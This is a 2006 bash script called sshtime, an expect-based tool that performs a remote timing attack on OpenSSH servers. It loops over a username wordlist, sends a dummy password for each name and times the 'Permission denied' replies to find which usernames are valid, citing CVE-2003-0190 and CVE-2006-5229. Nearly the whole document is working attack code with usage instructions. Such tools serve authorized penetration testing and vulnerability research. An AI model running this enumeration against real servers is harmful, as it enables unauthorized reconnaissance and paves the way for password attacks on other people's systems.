#!/bin/bash

#
# $Id: sshtime,v 1.3 2006/10/11 15:32:31 raptor Exp $
#
# sshtime v0.1 - Simple OpenSSH remote timing attack tool
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# SSHtime is a shell script based on expect meant to remotely analyze timing 
# differences in sshd "Permission denied" replies. Depending on OpenSSH 
# version and configuration, it may lead to disclosure of valid usernames. 
#
# See also: 
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5229
#
# Usage example: 
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#

# Some vars
port=22

# Command line
host=$1
dict=$2

# Local functions
function head() {
  echo ""
  echo "sshtime v0.1 - Simple OpenSSH remote timing attack tool"
  echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
  echo ""
}

function foot() {
  echo ""
  exit 0
}
  
function usage() {
  head
  echo "[make sure the target hostkey has been approved before]"
  echo ""
  echo "usage  : ./sshtime <target> <wordlist>"
  echo "example: ./sshtime 192.168.0.1 dict.txt"
  foot
}

function notfound() {
  head
  echo "error  : expect interpreter not found!"
  foot
}

# Check if expect is there
expect=`which expect 2>/dev/null`
if [ $? -ne 0 ]; then
  notfound
fi

# Input control
if [ -z "$2"  ]; then
  usage
fi

# Perform the bruteforce attack
head

for user in `cat $dict`
do
  echo -ne "$user@$host\t\t"
  (time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
done

foot